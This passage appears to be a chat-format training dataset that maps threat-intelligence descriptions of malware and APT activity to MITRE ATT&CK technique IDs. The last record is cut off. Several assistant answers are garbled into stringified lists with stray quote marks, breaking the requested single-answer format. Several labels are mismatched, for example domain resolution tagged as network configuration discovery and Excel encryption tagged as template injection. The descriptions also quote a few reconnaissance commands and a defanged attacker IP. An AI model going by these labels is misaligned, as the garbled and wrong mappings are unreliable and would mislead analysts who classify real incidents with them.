- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Seasalt has a command to perform a process listing."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Various implementations of CHOPSTICK communicate with C2 over SMTP and POP3."
- },
- {
- "role": "assistant",
- "content": "T1071.003 - Mail Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Frankenstein has harvested credentials from the victim's machine using Empire."
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "On other websites, different cloud storage solutions such as Amazon S3 or Google Drive were used to host Windows, OSX, and Android malware payloads"
- },
- {
- "role": "assistant",
- "content": "T1583.006 - Web Services', 'T1102 - Web Service', 'T1608.001 - Upload Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can alter the victim's proxy configuration."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Emotet has used HTTP over ports such as 20, 22, 7080, and 50000, in addition to using ports commonly associated with HTTP/S."
- },
- {
- "role": "assistant",
- "content": "T1571 - Non-Standard Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "When run, GoldMax decodes (Base64) and decrypts (AES-256) the configuration data to reveal a custom data structure comprised of the following dynamically generated and hardcoded values (delimited by"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OLDBAIT obfuscates internal strings and unpacks them at startup."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ZIRCONIUM has created a Registry Run key named \"Dropbox Update Setup\" to establish persistence for a malicious Python binary."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The decrypted code resolves the necessary API functions, decompresses the embedded PE file with RtlCompressBuffer() using LZNT1 and maps it into memory"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "For instance, the character A would be represented by the two characters 41, which is the hexadecimal representation of that character. The run command (1) creates the process cmd.exe /c with the command parameters appended and will write the output of the command in hexadecimal format to the file %APPDATA%\\tmpCa.vbs. The Trojan will then read the hexadecimal formatted contents of this file in 1500 byte blocks, sending each 1500 bytes of data from the file to the C2 server via an HTTP GET request to a URL with the following structure: http://<c2 domain>/resp. hex(Environment.UserName/Environment.MachineName)>AAZ<hex(command prompt output)> The upload command (2) writes data provided by the C2 to a specified file. hex(Environment.UserName/Environment.MachineName)>AAZ<hex(\"File Uploaded\")> The download command (3) reads the contents of a specified file and sends the data to the C2 server. If the file does not exist, the Trojan will send the C2 server a message < File Not Found > by sending the following URL: http://<c2 domain>/resp. hex(Environment.UserName/Environment.MachineName)>AAZ<hex(\"< File Not Found >\")> If the file exists, the Trojan will read the contents of the specified file and compresses the contents using the GZipStream class. The Trojan then gets the hexadecimal values of the compressed data and will replace the following hexadecimal values on each line with ASCII characters to further compressed the data"
- },
- {
- "role": "assistant",
- "content": "T1560.003 - Archive via Custom Method"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware continues by creating a service named mssecsvc2.0 with a binary path pointing to the running module with the arguments \"-m security\". Once created, the malware starts the service"
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Rocke conducted scanning for exposed TCP port 7001 as well as SSH and Redis servers."
- },
- {
- "role": "assistant",
- "content": "T1046 - Network Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT1 gathered a list of running processes on the system using \"tasklist /v\"."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Hildegard has used masscan to search for kubelets and the kubelet API for additional running containers."
- },
- {
- "role": "assistant",
- "content": "T1613 - Container and Resource Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Derusbi gathers the name of the local host, version of GNU Compiler Collection (GCC), and the system information about the CPU, machine, and operating system."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has a tool called CANDYKING to capture a screenshot of user's desktop."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attacker then executed a persistent malicious PowerShell code that was used to download and execute another PowerShell backdoor file in the server from the malicious IP address 185[.]82[.]219[.]201, as shown in Figure 7."
- },
- {
- "role": "assistant",
- "content": "T1590.005 - IP Addresses', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 'T1027.003 - Steganography', 'T1216 - Signed Script Proxy Execution', 'T1546.013 - Event Triggered Execution: PowerShell Profile', 'T1059 - Command and Scripting Interpreter', 'T1064 - Scripting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses ports 447 and 8082 for C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1571 - Non-Standard Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The wiper could be configured to use a file to overwrite the files on the disk using the ‘F’ configuration flag, as we saw images used to overwrite files in previous Shamoon attacks. This file would be stored in a resource named ‘GRANT’, but this particular wiper is not configured to use a file for overwriting so the GRANT resource does not exist. If it were configured to use a file, this sample would extract the file using the information listed in Table 5"
- },
- {
- "role": "assistant",
- "content": "T1561.002 - Disk Structure Wipe"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kobalos can exfiltrate credentials over the network via UDP."
- },
- {
- "role": "assistant",
- "content": "T1048 - Exfiltration Over Alternative Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PingPull can enumerate storage volumes and folder contents of a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "installs a root certificate to aid in man-in-the-middle actions."
- },
- {
- "role": "assistant",
- "content": "T1553.004 - Subvert Trust Controls: Install Root Certificate"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ZIRCONIUM has used malicious links in e-mails to lure victims into downloading malware."
- },
- {
- "role": "assistant",
- "content": "T1204.001 - Malicious Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "By performing two-factor authentication interception by receiving the OTP on their own telephone number, they gained access to the company network via the VPN. Our hypothesis is that they tested the 2FA-system first or selected the primary phone number to send a SMS to. Thus the 2FA code was sent with supporting Chinese text"
- },
- {
- "role": "assistant",
- "content": "T1111 - Multi-Factor Authentication Interception"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Trojan.Karagany can base64 encode and AES-128-CBC encrypt data prior to transmission."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Valak has the ability to base64 encode and XOR encrypt strings."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In February 2018, several KHRAT associated domains began resolving to the IP address 89.46.222[.]97"
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "injects into other processes to load modules."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KONNI has used HTTP POST for C2."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Magic Hound has used SMS and email messages with links designed to steal credentials."
- },
- {
- "role": "assistant",
- "content": "T1598.003 - Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "may collect network configuration data by running ipconfig /all on a victim."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CrossRAT creates a Launch Agent on macOS."
- },
- {
- "role": "assistant",
- "content": "T1543.001 - Create or Modify System Process: Launch Agent"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FELIXROOT encrypts strings in the backdoor using a custom XOR algorithm."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This phase will often leverage a specialized tool that automatically collects a wide array of information including credentials, group management policies, and even system logs to better hone further attacks and assure execution of their malware"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attackers typically distribute Netwalker ransomware with the use of a reflective PowerShell loader script that has been protected from casual analysis with several layers of obfuscation."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter', 'T1064 - Scripting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "To gain access to victim environments, the threat actor began by targeting handpicked employees using LinkedIn messaging and email, advertising fake jobs to lure recipients into checking into the supposed offers. In one case, we uncovered evidence indicating that the attacker had established communication with a victim via email and convinced them to click on a Google Drive URL purporting to contain an attractive job advert. Once clicked, the URL displayed the message, “Online preview is not available,” then presented a second URL leading to a compromised or rogue domain, where the victim could download the payload under the guise of a job description"
- },
- {
- "role": "assistant",
- "content": "T1566.003 - Spearphishing via Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Maze-delivered virtual machine was running Windows 7, as opposed to the Windows XP VM distributed in the Ragnar Locker incident. In this case, Cryptoguard was preventing the malware from encrypting files by intercepting and neutralizing the Windows APIs that the ransomware was attempting to use to encrypt the hard drive. Weaponized virtual machine . The Maze attackers delivered the attack components for the third attack in the form of an .msi installer file. The root of that virtual disk contained three files associated with the Maze ransomware: preload.bat, vrun.exe, and a file just named payload (with no file extension), which is the actual Maze DLL payload. The Maze attackers took a slightly different approach, using a virtual Windows 7 machine instead of XP. The virtual machine (VM) that Sophos extracted from the Maze attack shows that this (newer) VM is configured in such a way that it allows easy insertion of another ransomware on the attacker’s ‘builder’ machine. But the cost in terms of size is signficant: The Ragnar Locker virtual disk was only a quarter the size of the nearly 2GB virtual disk used in the Maze attack—all just to conceal one 494 KB ransomware executable from detection. The attackers also executed the following commands on the host computer during the Maze attack: This ran the Microsoft Installer that installs VirtualBox and the virtual hard drive. They stop the Volume Shadow Copy service; the ransomware itself includes a command to delete existing shadow copies. The Maze threat actors have proven to be adept at adopting the techniques demonstrated to be successful by other ransomware gangs, including the use of extortion as a means to extract payment from victims"
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chaes has added persistence via the Registry key \"software\\microsoft\\windows\\currentversion\\run\\microsoft windows html help\"."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "steals user files from local hard drives with file extensions that match a predefined list."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The code then decodes this set of import symbols and resolves addresses for its networking and data stealing functionality: InternetCloseHandle InternetReadFile HttpSendRequestA HttpOpenRequestA HttpQueryInfoA InternetConnectA InternetCrackUrlA InternetOpenA InternetSetOptionW GetAdaptersInfo Much like the prior office monkey “atiumdag.dll” component, this code collects identifying system information using standard win32 API calls: Computer name – GetComputerNameW User name – GetUserNameW Adapter GUID, ip address, mac address – GetAdaptersInfo Windows version – GetVersionExW It then uses the runtime resolved networking API calls to send the collected data back to a hardcoded c2 and set of urls"
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API', 'T1140 - Deobfuscate/Decode Files or Information', 'T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MarkiRAT can look for files carrying specific extensions such as: .rtf, .doc, .docx, .xls, .xlsx, .ppt, .pptx, .pps, .ppsx, .txt, .gpg, .pkr, .kdbx, .key, and .jpb."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is capable of providing shell functionality to the attacker to execute commands."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OilRig has run \"net user\", \"net user /domain\", \"net group “domain admins” /domain\", and \"net group “Exchange Trusted Subsystem” /domain\" to get account listings on a victim."
- },
- {
- "role": "assistant",
- "content": "T1087.001 - Account Discovery: Local Account', 'T1087.002 - Account Discovery: Domain Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Russian-speaking APT group Turla (known variously as ‘Snake’, ‘Uroburos’, ‘Venomous Bear’ and ‘KRYPTON’) has been active since at least 2007 (and maybe even longer). Its activities have been traced to many high-profile incidents, including the 2008 attack against the US Central Command (the Buckshot Yankee incident) and, more recently, the attack against the Swiss military contractor, RUAG. We’ve discuss its activities on a number of occasions (here, here, here and here). The group intensified its activities in 2014, targeting Ukraine, EU-related institutions, governments of EU countries, global foreign affairs ministries, media companies and possibly corruption-related targets in Russia. In 2015 and 2016 the group diversified its activities, switching from the Epic Turla watering-hole framework to the Gloog Turla framework, which is still active. The group also expanded its spear-phishing activities with the Skipper/WhiteAtlas attacks, which made use of new malware. Recently, the group has intensified its satellite-based C2 registrations ten-fold compared to the 2015 average."
- },
- {
- "role": "assistant",
- "content": "T1587.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It is worth noting that in 2019, this actor used a fake file extension (*.png) for the MSI binary hosted on the attacker-controlled GitHub account"
- },
- {
- "role": "assistant",
- "content": "T1583.006 - Web Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The loaded DLL retrieves the path to the Warzone malicious file from HKCU\\SOFTWARE\\_rptls\\Install, iterates through running processes and kills the Warzone process if it already exists. Then it runs the Warzone executable again, this time with Admin privileges"
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "UNC2452 used a forged \"duo-sid\" cookie to bypass MFA set on an email account."
- },
- {
- "role": "assistant",
- "content": "T1550.004 - Web Session Cookie"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "executes commands using a command-line interface and reverse shell. The group has used a modified version of pentesting script wmiexec.vbs to execute commands."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pysa can perform OS credential dumping using Mimikatz."
- },
- {
- "role": "assistant",
- "content": "T1003.001 - OS Credential Dumping: LSASS Memory"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ccf32 can upload collected data and files to an FTP server."
- },
- {
- "role": "assistant",
- "content": "T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Our dynamic analysis showed Lokibot’s behavior, including the benefits and drawbacks of several unpacking methods. Lokibot also used an infected system machine global unique identifier (GUID) value to generate a mutex (an MD5 hash) that acted as a flag to prevent itself from infecting the same machine again. The subject lines of the campaign messages usually started with or included the term “proforma. The malicious attachment was a DOCX, with a file name that also included “proforma” in its pattern. TLP: WHITE https://www.us-cert.gov/tlpCharacteristicsLokibot is an information stealer; the main functionality of its binary is to collect system and application credentials, and user information to send back to the attacker. We then conducted a static analysis to examine Lokibot’s techniques and targets. It starts from the tenth byte in the data section of the initial TCP POST request. We also noticed that the value of the sub key is the path to the file that Lokibot created after its initial execution. The binary’s hardcoded strings provided data about the binary’s characteristics, behavior, and main functionality.Section HeadersFrom the section headers and distribution of each section, the binary appears to be fairly normal. Figure 9Hollow Process; Manually Unpacking the First Stage BinaryWe tried to follow the binary with a debugger to determine where it unpacked itself in the memory, but Lokibot used a hollow process technique to obscure some of this activity"
- },
- {
- "role": "assistant",
- "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Frankenstein, the threat actors collected information via Empire, which was automatically sent back to the adversary's C2."
- },
- {
- "role": "assistant",
- "content": "T1020 - Automated Exfiltration"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kasidet creates a Registry Run key to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The delivery document uses the XLSX extension typically used by OpenXML documents, but the file itself is actually an OLE (XLS) document. The file extension to file type discrepancy was caused by the actor using Excel's built-in encryption capability, which stores XLSX ciphertext and the information needed for decryption in an OLE document"
- },
- {
- "role": "assistant",
- "content": "T1221 - Template Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mosquito uses COM hijacking as a method of persistence."
- },
- {
- "role": "assistant",
- "content": "T1546.015 - Event Triggered Execution: Component Object Model Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kazuar downloads additional plug-ins to load on the victim’s machine, including the ability to upgrade and replace its own binary."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NOKKI has used HTTP for C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HEXANE has established fraudulent LinkedIn accounts impersonating HR department employees to target potential victims with fake job offers."
- },
- {
- "role": "assistant",
- "content": "T1585.001 - Social Media Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OilRig has used compromised credentials to access other systems on a victim network."
- },
- {
- "role": "assistant",
- "content": "T1078 - Valid Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The first stage shellcode contains an interesting NOP sled with alternative instructions, which was most likely designed in such a way to avoid detection by antivirus products looking for large NOP blocks inside flash files"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NETWIRE can create a scheduled task to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "captures hashes and credentials that are sent to the system after the name services have been poisoned."
- },
- {
- "role": "assistant",
- "content": "T1040 - Network Sniffing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Leafminer used a tool called Imecab to set up a persistent remote access account on the victim machine."
- },
- {
- "role": "assistant",
- "content": "T1136.001 - Create Account: Local Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cardinal RAT can execute commands."
- },
- {
- "role": "assistant",
